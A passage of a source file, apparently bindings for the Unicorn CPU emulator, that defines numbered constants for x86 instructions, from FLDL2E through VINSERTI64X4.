UC_X86_INS_FLDL2E = 171 let UC_X86_INS_FLDL2T = 172 let UC_X86_INS_FLDLG2 = 173 let UC_X86_INS_FLDLN2 = 174 let UC_X86_INS_FLDPI = 175 let UC_X86_INS_FNCLEX = 176 let UC_X86_INS_FNINIT = 177 let UC_X86_INS_FNOP = 178 let UC_X86_INS_FNSTCW = 179 let UC_X86_INS_FNSTSW = 180 let UC_X86_INS_FPATAN = 181 let UC_X86_INS_FPREM = 182 let UC_X86_INS_FPREM1 = 183 let UC_X86_INS_FPTAN = 184 let UC_X86_INS_FFREEP = 185 let UC_X86_INS_FRNDINT = 186 let UC_X86_INS_FRSTOR = 187 let UC_X86_INS_FNSAVE = 188 let UC_X86_INS_FSCALE = 189 let UC_X86_INS_FSETPM = 190 let UC_X86_INS_FSINCOS = 191 let UC_X86_INS_FNSTENV = 192 let UC_X86_INS_FXAM = 193 let UC_X86_INS_FXRSTOR = 194 let UC_X86_INS_FXRSTOR64 = 195 let UC_X86_INS_FXSAVE = 196 let UC_X86_INS_FXSAVE64 = 197 let UC_X86_INS_FXTRACT = 198 let UC_X86_INS_FYL2X = 199 let UC_X86_INS_FYL2XP1 = 200 let UC_X86_INS_MOVAPD = 201 let UC_X86_INS_MOVAPS = 202 let UC_X86_INS_ORPD = 203 let UC_X86_INS_ORPS = 204 let UC_X86_INS_VMOVAPD = 205 let UC_X86_INS_VMOVAPS = 206 let UC_X86_INS_XORPD = 207 let UC_X86_INS_XORPS = 208 let UC_X86_INS_GETSEC = 209 let UC_X86_INS_HADDPD = 210 let UC_X86_INS_HADDPS = 211 let UC_X86_INS_HLT = 212 let UC_X86_INS_HSUBPD = 213 let UC_X86_INS_HSUBPS = 214 let UC_X86_INS_IDIV = 215 let UC_X86_INS_FILD = 216 let UC_X86_INS_IMUL = 217 let UC_X86_INS_IN = 218 let UC_X86_INS_INC = 219 let UC_X86_INS_INSB = 220 let UC_X86_INS_INSERTPS = 221 let UC_X86_INS_INSERTQ = 222 let UC_X86_INS_INSD = 223 let UC_X86_INS_INSW = 224 let UC_X86_INS_INT = 225 let UC_X86_INS_INT1 = 226 let UC_X86_INS_INT3 = 227 let UC_X86_INS_INTO = 228 let UC_X86_INS_INVD = 229 let UC_X86_INS_INVEPT = 230 let UC_X86_INS_INVLPG = 231 let UC_X86_INS_INVLPGA = 232 let UC_X86_INS_INVPCID = 233 let UC_X86_INS_INVVPID = 234 let UC_X86_INS_IRET = 235 let UC_X86_INS_IRETD = 236 let UC_X86_INS_IRETQ = 237 let UC_X86_INS_FISTTP = 238 let UC_X86_INS_FIST = 239 let UC_X86_INS_FISTP = 240 let UC_X86_INS_UCOMISD = 241 let UC_X86_INS_UCOMISS = 242 let UC_X86_INS_VCOMISD = 243 let UC_X86_INS_VCOMISS = 244 let UC_X86_INS_VCVTSD2SS = 245 let UC_X86_INS_VCVTSI2SD = 246 let UC_X86_INS_VCVTSI2SS = 247 let UC_X86_INS_VCVTSS2SD = 248 let UC_X86_INS_VCVTTSD2SI = 249 let UC_X86_INS_VCVTTSD2USI = 250 let UC_X86_INS_VCVTTSS2SI = 251 let UC_X86_INS_VCVTTSS2USI = 252 let UC_X86_INS_VCVTUSI2SD = 253 let UC_X86_INS_VCVTUSI2SS = 254 let UC_X86_INS_VUCOMISD = 255 let UC_X86_INS_VUCOMISS = 256 let UC_X86_INS_JAE = 257 let UC_X86_INS_JA = 258 let UC_X86_INS_JBE = 259 let UC_X86_INS_JB = 260 let UC_X86_INS_JCXZ = 261 let UC_X86_INS_JECXZ = 262 let UC_X86_INS_JE = 263 let UC_X86_INS_JGE = 264 let UC_X86_INS_JG = 265 let UC_X86_INS_JLE = 266 let UC_X86_INS_JL = 267 let UC_X86_INS_JMP = 268 let UC_X86_INS_JNE = 269 let UC_X86_INS_JNO = 270 let UC_X86_INS_JNP = 271 let UC_X86_INS_JNS = 272 let UC_X86_INS_JO = 273 let UC_X86_INS_JP = 274 let UC_X86_INS_JRCXZ = 275 let UC_X86_INS_JS = 276 let UC_X86_INS_KANDB = 277 let UC_X86_INS_KANDD = 278 let UC_X86_INS_KANDNB = 279 let UC_X86_INS_KANDND = 280 let UC_X86_INS_KANDNQ = 281 let UC_X86_INS_KANDNW = 282 let UC_X86_INS_KANDQ = 283 let UC_X86_INS_KANDW = 284 let UC_X86_INS_KMOVB = 285 let UC_X86_INS_KMOVD = 286 let UC_X86_INS_KMOVQ = 287 let UC_X86_INS_KMOVW = 288 let UC_X86_INS_KNOTB = 289 let UC_X86_INS_KNOTD = 290 let UC_X86_INS_KNOTQ = 291 let UC_X86_INS_KNOTW = 292 let UC_X86_INS_KORB = 293 let UC_X86_INS_KORD = 294 let UC_X86_INS_KORQ = 295 let UC_X86_INS_KORTESTB = 296 let UC_X86_INS_KORTESTD = 297 let UC_X86_INS_KORTESTQ = 298 let UC_X86_INS_KORTESTW = 299 let UC_X86_INS_KORW = 300 let UC_X86_INS_KSHIFTLB = 301 let UC_X86_INS_KSHIFTLD = 302 let UC_X86_INS_KSHIFTLQ = 303 let UC_X86_INS_KSHIFTLW = 304 let UC_X86_INS_KSHIFTRB = 305 let UC_X86_INS_KSHIFTRD = 306 let UC_X86_INS_KSHIFTRQ = 307 let UC_X86_INS_KSHIFTRW = 308 let UC_X86_INS_KUNPCKBW = 309 let UC_X86_INS_KXNORB = 310 let UC_X86_INS_KXNORD = 311 let UC_X86_INS_KXNORQ = 312 let UC_X86_INS_KXNORW = 313 let UC_X86_INS_KXORB = 314 let UC_X86_INS_KXORD = 315 let UC_X86_INS_KXORQ = 316 let UC_X86_INS_KXORW = 317 let UC_X86_INS_LAHF = 318 let UC_X86_INS_LAR = 319 let UC_X86_INS_LDDQU = 320 let UC_X86_INS_LDMXCSR = 321 let UC_X86_INS_LDS = 322 let UC_X86_INS_FLDZ = 323 let UC_X86_INS_FLD1 = 324 let UC_X86_INS_FLD = 325 let UC_X86_INS_LEA = 326 let UC_X86_INS_LEAVE = 327 let UC_X86_INS_LES = 328 let UC_X86_INS_LFENCE = 329 let UC_X86_INS_LFS = 330 let UC_X86_INS_LGDT = 331 let UC_X86_INS_LGS = 332 let UC_X86_INS_LIDT = 333 let UC_X86_INS_LLDT = 334 let UC_X86_INS_LMSW = 335 let UC_X86_INS_OR = 336 let UC_X86_INS_SUB = 337 let UC_X86_INS_XOR = 338 let UC_X86_INS_LODSB = 339 let UC_X86_INS_LODSD = 340 let UC_X86_INS_LODSQ = 341 let UC_X86_INS_LODSW = 342 let UC_X86_INS_LOOP = 343 let UC_X86_INS_LOOPE = 344 let UC_X86_INS_LOOPNE = 345 let UC_X86_INS_RETF = 346 let UC_X86_INS_RETFQ = 347 let UC_X86_INS_LSL = 348 let UC_X86_INS_LSS = 349 let UC_X86_INS_LTR = 350 let UC_X86_INS_XADD = 351 let UC_X86_INS_LZCNT = 352 let UC_X86_INS_MASKMOVDQU = 353 let UC_X86_INS_MAXPD = 354 let UC_X86_INS_MAXPS = 355 let UC_X86_INS_MAXSD = 356 let UC_X86_INS_MAXSS = 357 let UC_X86_INS_MFENCE = 358 let UC_X86_INS_MINPD = 359 let UC_X86_INS_MINPS = 360 let UC_X86_INS_MINSD = 361 let UC_X86_INS_MINSS = 362 let UC_X86_INS_CVTPD2PI = 363 let UC_X86_INS_CVTPI2PD = 364 let UC_X86_INS_CVTPI2PS = 365 let UC_X86_INS_CVTPS2PI = 366 let UC_X86_INS_CVTTPD2PI = 367 let UC_X86_INS_CVTTPS2PI = 368 let UC_X86_INS_EMMS = 369 let UC_X86_INS_MASKMOVQ = 370 let UC_X86_INS_MOVD = 371 let UC_X86_INS_MOVDQ2Q = 372 let UC_X86_INS_MOVNTQ = 373 let UC_X86_INS_MOVQ2DQ = 374 let UC_X86_INS_MOVQ = 375 let UC_X86_INS_PABSB = 376 let UC_X86_INS_PABSD = 377 let UC_X86_INS_PABSW = 378 let UC_X86_INS_PACKSSDW = 379 let UC_X86_INS_PACKSSWB = 380 let UC_X86_INS_PACKUSWB = 381 let UC_X86_INS_PADDB = 382 let UC_X86_INS_PADDD = 383 let UC_X86_INS_PADDQ = 384 let UC_X86_INS_PADDSB = 385 let UC_X86_INS_PADDSW = 386 let UC_X86_INS_PADDUSB = 387 let UC_X86_INS_PADDUSW = 388 let UC_X86_INS_PADDW = 389 let UC_X86_INS_PALIGNR = 390 let UC_X86_INS_PANDN = 391 let UC_X86_INS_PAND = 392 let UC_X86_INS_PAVGB = 393 let UC_X86_INS_PAVGW = 394 let UC_X86_INS_PCMPEQB = 395 let UC_X86_INS_PCMPEQD = 396 let UC_X86_INS_PCMPEQW = 397 let UC_X86_INS_PCMPGTB = 398 let UC_X86_INS_PCMPGTD = 399 let UC_X86_INS_PCMPGTW = 400 let UC_X86_INS_PEXTRW = 401 let UC_X86_INS_PHADDSW = 402 let UC_X86_INS_PHADDW = 403 let UC_X86_INS_PHADDD = 404 let UC_X86_INS_PHSUBD = 405 let UC_X86_INS_PHSUBSW = 406 let UC_X86_INS_PHSUBW = 407 let UC_X86_INS_PINSRW = 408 let UC_X86_INS_PMADDUBSW = 409 let UC_X86_INS_PMADDWD = 410 let UC_X86_INS_PMAXSW = 411 let UC_X86_INS_PMAXUB = 412 let UC_X86_INS_PMINSW = 413 let UC_X86_INS_PMINUB = 414 let UC_X86_INS_PMOVMSKB = 415 let UC_X86_INS_PMULHRSW = 416 let UC_X86_INS_PMULHUW = 417 let UC_X86_INS_PMULHW = 418 let UC_X86_INS_PMULLW = 419 let UC_X86_INS_PMULUDQ = 420 let UC_X86_INS_POR = 421 let UC_X86_INS_PSADBW = 422 let UC_X86_INS_PSHUFB = 423 let UC_X86_INS_PSHUFW = 424 let UC_X86_INS_PSIGNB = 425 let UC_X86_INS_PSIGND = 426 let UC_X86_INS_PSIGNW = 427 let UC_X86_INS_PSLLD = 428 let UC_X86_INS_PSLLQ = 429 let UC_X86_INS_PSLLW = 430 let UC_X86_INS_PSRAD = 431 let UC_X86_INS_PSRAW = 432 let UC_X86_INS_PSRLD = 433 let UC_X86_INS_PSRLQ = 434 let UC_X86_INS_PSRLW = 435 let UC_X86_INS_PSUBB = 436 let UC_X86_INS_PSUBD = 437 let UC_X86_INS_PSUBQ = 438 let UC_X86_INS_PSUBSB = 439 let UC_X86_INS_PSUBSW = 440 let UC_X86_INS_PSUBUSB = 441 let UC_X86_INS_PSUBUSW = 442 let UC_X86_INS_PSUBW = 443 let UC_X86_INS_PUNPCKHBW = 444 let UC_X86_INS_PUNPCKHDQ = 445 let UC_X86_INS_PUNPCKHWD = 446 let UC_X86_INS_PUNPCKLBW = 447 let UC_X86_INS_PUNPCKLDQ = 448 let UC_X86_INS_PUNPCKLWD = 449 let UC_X86_INS_PXOR = 450 let UC_X86_INS_MONITOR = 451 let UC_X86_INS_MONTMUL = 452 let UC_X86_INS_MOV = 453 let UC_X86_INS_MOVABS = 454 let UC_X86_INS_MOVBE = 455 let UC_X86_INS_MOVDDUP = 456 let UC_X86_INS_MOVDQA = 457 let UC_X86_INS_MOVDQU = 458 let UC_X86_INS_MOVHLPS = 459 let UC_X86_INS_MOVHPD = 460 let UC_X86_INS_MOVHPS = 461 let UC_X86_INS_MOVLHPS = 462 let UC_X86_INS_MOVLPD = 463 let UC_X86_INS_MOVLPS = 464 let UC_X86_INS_MOVMSKPD = 465 let UC_X86_INS_MOVMSKPS = 466 let UC_X86_INS_MOVNTDQA = 467 let UC_X86_INS_MOVNTDQ = 468 let UC_X86_INS_MOVNTI = 469 let UC_X86_INS_MOVNTPD = 470 let UC_X86_INS_MOVNTPS = 471 let UC_X86_INS_MOVNTSD = 472 let UC_X86_INS_MOVNTSS = 473 let UC_X86_INS_MOVSB = 474 let UC_X86_INS_MOVSD = 475 let UC_X86_INS_MOVSHDUP = 476 let UC_X86_INS_MOVSLDUP = 477 let UC_X86_INS_MOVSQ = 478 let UC_X86_INS_MOVSS = 479 let UC_X86_INS_MOVSW = 480 let UC_X86_INS_MOVSX = 481 let UC_X86_INS_MOVSXD = 482 let UC_X86_INS_MOVUPD = 483 let UC_X86_INS_MOVUPS = 484 let UC_X86_INS_MOVZX = 485 let UC_X86_INS_MPSADBW = 486 let UC_X86_INS_MUL = 487 let UC_X86_INS_MULPD = 488 let UC_X86_INS_MULPS = 489 let UC_X86_INS_MULSD = 490 let UC_X86_INS_MULSS = 491 let UC_X86_INS_MULX = 492 let UC_X86_INS_FMUL = 493 let UC_X86_INS_FIMUL = 494 let UC_X86_INS_FMULP = 495 let UC_X86_INS_MWAIT = 496 let UC_X86_INS_NEG = 497 let UC_X86_INS_NOP = 498 let UC_X86_INS_NOT = 499 let UC_X86_INS_OUT = 500 let UC_X86_INS_OUTSB = 501 let UC_X86_INS_OUTSD = 502 let UC_X86_INS_OUTSW = 503 let UC_X86_INS_PACKUSDW = 504 let UC_X86_INS_PAUSE = 505 let UC_X86_INS_PAVGUSB = 506 let UC_X86_INS_PBLENDVB = 507 let UC_X86_INS_PBLENDW = 508 let UC_X86_INS_PCLMULQDQ = 509 let UC_X86_INS_PCMPEQQ = 510 let UC_X86_INS_PCMPESTRI = 511 let UC_X86_INS_PCMPESTRM = 512 let UC_X86_INS_PCMPGTQ = 513 let UC_X86_INS_PCMPISTRI = 514 let UC_X86_INS_PCMPISTRM = 515 let UC_X86_INS_PCOMMIT = 516 let UC_X86_INS_PDEP = 517 let UC_X86_INS_PEXT = 518 let UC_X86_INS_PEXTRB = 519 let UC_X86_INS_PEXTRD = 520 let UC_X86_INS_PEXTRQ = 521 let UC_X86_INS_PF2ID = 522 let UC_X86_INS_PF2IW = 523 let UC_X86_INS_PFACC = 524 let UC_X86_INS_PFADD = 525 let UC_X86_INS_PFCMPEQ = 526 let UC_X86_INS_PFCMPGE = 527 let UC_X86_INS_PFCMPGT = 528 let UC_X86_INS_PFMAX = 529 let UC_X86_INS_PFMIN = 530 let UC_X86_INS_PFMUL = 531 let UC_X86_INS_PFNACC = 532 let UC_X86_INS_PFPNACC = 533 let UC_X86_INS_PFRCPIT1 = 534 let UC_X86_INS_PFRCPIT2 = 535 let UC_X86_INS_PFRCP = 536 let UC_X86_INS_PFRSQIT1 = 537 let UC_X86_INS_PFRSQRT = 538 let UC_X86_INS_PFSUBR = 539 let UC_X86_INS_PFSUB = 540 let UC_X86_INS_PHMINPOSUW = 541 let UC_X86_INS_PI2FD = 542 let UC_X86_INS_PI2FW = 543 let UC_X86_INS_PINSRB = 544 let UC_X86_INS_PINSRD = 545 let UC_X86_INS_PINSRQ = 546 let UC_X86_INS_PMAXSB = 547 let UC_X86_INS_PMAXSD = 548 let UC_X86_INS_PMAXUD = 549 let UC_X86_INS_PMAXUW = 550 let UC_X86_INS_PMINSB = 551 let UC_X86_INS_PMINSD = 552 let UC_X86_INS_PMINUD = 553 let UC_X86_INS_PMINUW = 554 let UC_X86_INS_PMOVSXBD = 555 let UC_X86_INS_PMOVSXBQ = 556 let UC_X86_INS_PMOVSXBW = 557 let UC_X86_INS_PMOVSXDQ = 558 let UC_X86_INS_PMOVSXWD = 559 let UC_X86_INS_PMOVSXWQ = 560 let UC_X86_INS_PMOVZXBD = 561 let UC_X86_INS_PMOVZXBQ = 562 let UC_X86_INS_PMOVZXBW = 563 let UC_X86_INS_PMOVZXDQ = 564 let UC_X86_INS_PMOVZXWD = 565 let UC_X86_INS_PMOVZXWQ = 566 let UC_X86_INS_PMULDQ = 567 let UC_X86_INS_PMULHRW = 568 let UC_X86_INS_PMULLD = 569 let UC_X86_INS_POP = 570 let UC_X86_INS_POPAW = 571 let UC_X86_INS_POPAL = 572 let UC_X86_INS_POPCNT = 573 let UC_X86_INS_POPF = 574 let UC_X86_INS_POPFD = 575 let UC_X86_INS_POPFQ = 576 let UC_X86_INS_PREFETCH = 577 let UC_X86_INS_PREFETCHNTA = 578 let UC_X86_INS_PREFETCHT0 = 579 let UC_X86_INS_PREFETCHT1 = 580 let UC_X86_INS_PREFETCHT2 = 581 let UC_X86_INS_PREFETCHW = 582 let UC_X86_INS_PSHUFD = 583 let UC_X86_INS_PSHUFHW = 584 let UC_X86_INS_PSHUFLW = 585 let UC_X86_INS_PSLLDQ = 586 let UC_X86_INS_PSRLDQ = 587 let UC_X86_INS_PSWAPD = 588 let UC_X86_INS_PTEST = 589 let UC_X86_INS_PUNPCKHQDQ = 590 let UC_X86_INS_PUNPCKLQDQ = 591 let UC_X86_INS_PUSH = 592 let UC_X86_INS_PUSHAW = 593 let UC_X86_INS_PUSHAL = 594 let UC_X86_INS_PUSHF = 595 let UC_X86_INS_PUSHFD = 596 let UC_X86_INS_PUSHFQ = 597 let UC_X86_INS_RCL = 598 let UC_X86_INS_RCPPS = 599 let UC_X86_INS_RCPSS = 600 let UC_X86_INS_RCR = 601 let UC_X86_INS_RDFSBASE = 602 let UC_X86_INS_RDGSBASE = 603 let UC_X86_INS_RDMSR = 604 let UC_X86_INS_RDPMC = 605 let UC_X86_INS_RDRAND = 606 let UC_X86_INS_RDSEED = 607 let UC_X86_INS_RDTSC = 608 let UC_X86_INS_RDTSCP = 609 let UC_X86_INS_ROL = 610 let UC_X86_INS_ROR = 611 let UC_X86_INS_RORX = 612 let UC_X86_INS_ROUNDPD = 613 let UC_X86_INS_ROUNDPS = 614 let UC_X86_INS_ROUNDSD = 615 let UC_X86_INS_ROUNDSS = 616 let UC_X86_INS_RSM = 617 let UC_X86_INS_RSQRTPS = 618 let UC_X86_INS_RSQRTSS = 619 let UC_X86_INS_SAHF = 620 let UC_X86_INS_SAL = 621 let UC_X86_INS_SALC = 622 let UC_X86_INS_SAR = 623 let UC_X86_INS_SARX = 624 let UC_X86_INS_SBB = 625 let UC_X86_INS_SCASB = 626 let UC_X86_INS_SCASD = 627 let UC_X86_INS_SCASQ = 628 let UC_X86_INS_SCASW = 629 let UC_X86_INS_SETAE = 630 let UC_X86_INS_SETA = 631 let UC_X86_INS_SETBE = 632 let UC_X86_INS_SETB = 633 let UC_X86_INS_SETE = 634 let UC_X86_INS_SETGE = 635 let UC_X86_INS_SETG = 636 let UC_X86_INS_SETLE = 637 let UC_X86_INS_SETL = 638 let UC_X86_INS_SETNE = 639 let UC_X86_INS_SETNO = 640 let UC_X86_INS_SETNP = 641 let UC_X86_INS_SETNS = 642 let UC_X86_INS_SETO = 643 let UC_X86_INS_SETP = 644 let UC_X86_INS_SETS = 645 let UC_X86_INS_SFENCE = 646 let UC_X86_INS_SGDT = 647 let UC_X86_INS_SHA1MSG1 = 648 let UC_X86_INS_SHA1MSG2 = 649 let UC_X86_INS_SHA1NEXTE = 650 let UC_X86_INS_SHA1RNDS4 = 651 let UC_X86_INS_SHA256MSG1 = 652 let UC_X86_INS_SHA256MSG2 = 653 let UC_X86_INS_SHA256RNDS2 = 654 let UC_X86_INS_SHL = 655 let UC_X86_INS_SHLD = 656 let UC_X86_INS_SHLX = 657 let UC_X86_INS_SHR = 658 let UC_X86_INS_SHRD = 659 let UC_X86_INS_SHRX = 660 let UC_X86_INS_SHUFPD = 661 let UC_X86_INS_SHUFPS = 662 let UC_X86_INS_SIDT = 663 let UC_X86_INS_FSIN = 664 let UC_X86_INS_SKINIT = 665 let UC_X86_INS_SLDT = 666 let UC_X86_INS_SMSW = 667 let UC_X86_INS_SQRTPD = 668 let UC_X86_INS_SQRTPS = 669 let UC_X86_INS_SQRTSD = 670 let UC_X86_INS_SQRTSS = 671 let UC_X86_INS_FSQRT = 672 let UC_X86_INS_STAC = 673 let UC_X86_INS_STC = 674 let UC_X86_INS_STD = 675 let UC_X86_INS_STGI = 676 let UC_X86_INS_STI = 677 let UC_X86_INS_STMXCSR = 678 let UC_X86_INS_STOSB = 679 let UC_X86_INS_STOSD = 680 let UC_X86_INS_STOSQ = 681 let UC_X86_INS_STOSW = 682 let UC_X86_INS_STR = 683 let UC_X86_INS_FST = 684 let UC_X86_INS_FSTP = 685 let UC_X86_INS_FSTPNCE = 686 let UC_X86_INS_FXCH = 687 let UC_X86_INS_SUBPD = 688 let UC_X86_INS_SUBPS = 689 let UC_X86_INS_FSUBR = 690 let UC_X86_INS_FISUBR = 691 let UC_X86_INS_FSUBRP = 692 let UC_X86_INS_SUBSD = 693 let UC_X86_INS_SUBSS = 694 let UC_X86_INS_FSUB = 695 let UC_X86_INS_FISUB = 696 let UC_X86_INS_FSUBP = 697 let UC_X86_INS_SWAPGS = 698 let UC_X86_INS_SYSCALL = 699 let UC_X86_INS_SYSENTER = 700 let UC_X86_INS_SYSEXIT = 701 let UC_X86_INS_SYSRET = 702 let UC_X86_INS_T1MSKC = 703 let UC_X86_INS_TEST = 704 let UC_X86_INS_UD2 = 705 let UC_X86_INS_FTST = 706 let UC_X86_INS_TZCNT = 707 let UC_X86_INS_TZMSK = 708 let UC_X86_INS_FUCOMPI = 709 let UC_X86_INS_FUCOMI = 710 let UC_X86_INS_FUCOMPP = 711 let UC_X86_INS_FUCOMP = 712 let UC_X86_INS_FUCOM = 713 let UC_X86_INS_UD2B = 714 let UC_X86_INS_UNPCKHPD = 715 let UC_X86_INS_UNPCKHPS = 716 let UC_X86_INS_UNPCKLPD = 717 let UC_X86_INS_UNPCKLPS = 718 let UC_X86_INS_VADDPD = 719 let UC_X86_INS_VADDPS = 720 let UC_X86_INS_VADDSD = 721 let UC_X86_INS_VADDSS = 722 let UC_X86_INS_VADDSUBPD = 723 let UC_X86_INS_VADDSUBPS = 724 let UC_X86_INS_VAESDECLAST = 725 let UC_X86_INS_VAESDEC = 726 let UC_X86_INS_VAESENCLAST = 727 let UC_X86_INS_VAESENC = 728 let UC_X86_INS_VAESIMC = 729 let UC_X86_INS_VAESKEYGENASSIST = 730 let UC_X86_INS_VALIGND = 731 let UC_X86_INS_VALIGNQ = 732 let UC_X86_INS_VANDNPD = 733 let UC_X86_INS_VANDNPS = 734 let UC_X86_INS_VANDPD = 735 let UC_X86_INS_VANDPS = 736 let UC_X86_INS_VBLENDMPD = 737 let UC_X86_INS_VBLENDMPS = 738 let UC_X86_INS_VBLENDPD = 739 let UC_X86_INS_VBLENDPS = 740 let UC_X86_INS_VBLENDVPD = 741 let UC_X86_INS_VBLENDVPS = 742 let UC_X86_INS_VBROADCASTF128 = 743 let UC_X86_INS_VBROADCASTI32X4 = 744 let UC_X86_INS_VBROADCASTI64X4 = 745 let UC_X86_INS_VBROADCASTSD = 746 let UC_X86_INS_VBROADCASTSS = 747 let UC_X86_INS_VCMPPD = 748 let UC_X86_INS_VCMPPS = 749 let UC_X86_INS_VCMPSD = 750 let UC_X86_INS_VCMPSS = 751 let UC_X86_INS_VCOMPRESSPD = 752 let UC_X86_INS_VCOMPRESSPS = 753 let UC_X86_INS_VCVTDQ2PD = 754 let UC_X86_INS_VCVTDQ2PS = 755 let UC_X86_INS_VCVTPD2DQX = 756 let UC_X86_INS_VCVTPD2DQ = 757 let UC_X86_INS_VCVTPD2PSX = 758 let UC_X86_INS_VCVTPD2PS = 759 let UC_X86_INS_VCVTPD2UDQ = 760 let UC_X86_INS_VCVTPH2PS = 761 let UC_X86_INS_VCVTPS2DQ = 762 let UC_X86_INS_VCVTPS2PD = 763 let UC_X86_INS_VCVTPS2PH = 764 let UC_X86_INS_VCVTPS2UDQ = 765 let UC_X86_INS_VCVTSD2SI = 766 let UC_X86_INS_VCVTSD2USI = 767 let UC_X86_INS_VCVTSS2SI = 768 let UC_X86_INS_VCVTSS2USI = 769 let UC_X86_INS_VCVTTPD2DQX = 770 let UC_X86_INS_VCVTTPD2DQ = 771 let UC_X86_INS_VCVTTPD2UDQ = 772 let UC_X86_INS_VCVTTPS2DQ = 773 let UC_X86_INS_VCVTTPS2UDQ = 774 let UC_X86_INS_VCVTUDQ2PD = 775 let UC_X86_INS_VCVTUDQ2PS = 776 let UC_X86_INS_VDIVPD = 777 let UC_X86_INS_VDIVPS = 778 let UC_X86_INS_VDIVSD = 779 let UC_X86_INS_VDIVSS = 780 let UC_X86_INS_VDPPD = 781 let UC_X86_INS_VDPPS = 782 let UC_X86_INS_VERR = 783 let UC_X86_INS_VERW = 784 let UC_X86_INS_VEXP2PD = 785 let UC_X86_INS_VEXP2PS = 786 let UC_X86_INS_VEXPANDPD = 787 let UC_X86_INS_VEXPANDPS = 788 let UC_X86_INS_VEXTRACTF128 = 789 let UC_X86_INS_VEXTRACTF32X4 = 790 let UC_X86_INS_VEXTRACTF64X4 = 791 let UC_X86_INS_VEXTRACTI128 = 792 let UC_X86_INS_VEXTRACTI32X4 = 793 let UC_X86_INS_VEXTRACTI64X4 = 794 let UC_X86_INS_VEXTRACTPS = 795 let UC_X86_INS_VFMADD132PD = 796 let UC_X86_INS_VFMADD132PS = 797 let UC_X86_INS_VFMADDPD = 798 let UC_X86_INS_VFMADD213PD = 799 let UC_X86_INS_VFMADD231PD = 800 let UC_X86_INS_VFMADDPS = 801 let UC_X86_INS_VFMADD213PS = 802 let UC_X86_INS_VFMADD231PS = 803 let UC_X86_INS_VFMADDSD = 804 let UC_X86_INS_VFMADD213SD = 805 let UC_X86_INS_VFMADD132SD = 806 let UC_X86_INS_VFMADD231SD = 807 let UC_X86_INS_VFMADDSS = 808 let UC_X86_INS_VFMADD213SS = 809 let UC_X86_INS_VFMADD132SS = 810 let UC_X86_INS_VFMADD231SS = 811 let UC_X86_INS_VFMADDSUB132PD = 812 let UC_X86_INS_VFMADDSUB132PS = 813 let UC_X86_INS_VFMADDSUBPD = 814 let UC_X86_INS_VFMADDSUB213PD = 815 let UC_X86_INS_VFMADDSUB231PD = 816 let UC_X86_INS_VFMADDSUBPS = 817 let UC_X86_INS_VFMADDSUB213PS = 818 let UC_X86_INS_VFMADDSUB231PS = 819 let UC_X86_INS_VFMSUB132PD = 820 let UC_X86_INS_VFMSUB132PS = 821 let UC_X86_INS_VFMSUBADD132PD = 822 let UC_X86_INS_VFMSUBADD132PS = 823 let UC_X86_INS_VFMSUBADDPD = 824 let UC_X86_INS_VFMSUBADD213PD = 825 let UC_X86_INS_VFMSUBADD231PD = 826 let UC_X86_INS_VFMSUBADDPS = 827 let UC_X86_INS_VFMSUBADD213PS = 828 let UC_X86_INS_VFMSUBADD231PS = 829 let UC_X86_INS_VFMSUBPD = 830 let UC_X86_INS_VFMSUB213PD = 831 let UC_X86_INS_VFMSUB231PD = 832 let UC_X86_INS_VFMSUBPS = 833 let UC_X86_INS_VFMSUB213PS = 834 let UC_X86_INS_VFMSUB231PS = 835 let UC_X86_INS_VFMSUBSD = 836 let UC_X86_INS_VFMSUB213SD = 837 let UC_X86_INS_VFMSUB132SD = 838 let UC_X86_INS_VFMSUB231SD = 839 let UC_X86_INS_VFMSUBSS = 840 let UC_X86_INS_VFMSUB213SS = 841 let UC_X86_INS_VFMSUB132SS = 842 let UC_X86_INS_VFMSUB231SS = 843 let UC_X86_INS_VFNMADD132PD = 844 let UC_X86_INS_VFNMADD132PS = 845 let UC_X86_INS_VFNMADDPD = 846 let UC_X86_INS_VFNMADD213PD = 847 let UC_X86_INS_VFNMADD231PD = 848 let UC_X86_INS_VFNMADDPS = 849 let UC_X86_INS_VFNMADD213PS = 850 let UC_X86_INS_VFNMADD231PS = 851 let UC_X86_INS_VFNMADDSD = 852 let UC_X86_INS_VFNMADD213SD = 853 let UC_X86_INS_VFNMADD132SD = 854 let UC_X86_INS_VFNMADD231SD = 855 let UC_X86_INS_VFNMADDSS = 856 let UC_X86_INS_VFNMADD213SS = 857 let UC_X86_INS_VFNMADD132SS = 858 let UC_X86_INS_VFNMADD231SS = 859 let UC_X86_INS_VFNMSUB132PD = 860 let UC_X86_INS_VFNMSUB132PS = 861 let UC_X86_INS_VFNMSUBPD = 862 let UC_X86_INS_VFNMSUB213PD = 863 let UC_X86_INS_VFNMSUB231PD = 864 let UC_X86_INS_VFNMSUBPS = 865 let UC_X86_INS_VFNMSUB213PS = 866 let UC_X86_INS_VFNMSUB231PS = 867 let UC_X86_INS_VFNMSUBSD = 868 let UC_X86_INS_VFNMSUB213SD = 869 let UC_X86_INS_VFNMSUB132SD = 870 let UC_X86_INS_VFNMSUB231SD = 871 let UC_X86_INS_VFNMSUBSS = 872 let UC_X86_INS_VFNMSUB213SS = 873 let UC_X86_INS_VFNMSUB132SS = 874 let UC_X86_INS_VFNMSUB231SS = 875 let UC_X86_INS_VFRCZPD = 876 let UC_X86_INS_VFRCZPS = 877 let UC_X86_INS_VFRCZSD = 878 let UC_X86_INS_VFRCZSS = 879 let UC_X86_INS_VORPD = 880 let UC_X86_INS_VORPS = 881 let UC_X86_INS_VXORPD = 882 let UC_X86_INS_VXORPS = 883 let UC_X86_INS_VGATHERDPD = 884 let UC_X86_INS_VGATHERDPS = 885 let UC_X86_INS_VGATHERPF0DPD = 886 let UC_X86_INS_VGATHERPF0DPS = 887 let UC_X86_INS_VGATHERPF0QPD = 888 let UC_X86_INS_VGATHERPF0QPS = 889 let UC_X86_INS_VGATHERPF1DPD = 890 let UC_X86_INS_VGATHERPF1DPS = 891 let UC_X86_INS_VGATHERPF1QPD = 892 let UC_X86_INS_VGATHERPF1QPS = 893 let UC_X86_INS_VGATHERQPD = 894 let UC_X86_INS_VGATHERQPS = 895 let UC_X86_INS_VHADDPD = 896 let UC_X86_INS_VHADDPS = 897 let UC_X86_INS_VHSUBPD = 898 let UC_X86_INS_VHSUBPS = 899 let UC_X86_INS_VINSERTF128 = 900 let UC_X86_INS_VINSERTF32X4 = 901 let UC_X86_INS_VINSERTF32X8 = 902 let UC_X86_INS_VINSERTF64X2 = 903 let UC_X86_INS_VINSERTF64X4 = 904 let UC_X86_INS_VINSERTI128 = 905 let UC_X86_INS_VINSERTI32X4 = 906 let UC_X86_INS_VINSERTI32X8 = 907 let UC_X86_INS_VINSERTI64X2 = 908 let UC_X86_INS_VINSERTI64X4 = 909 let 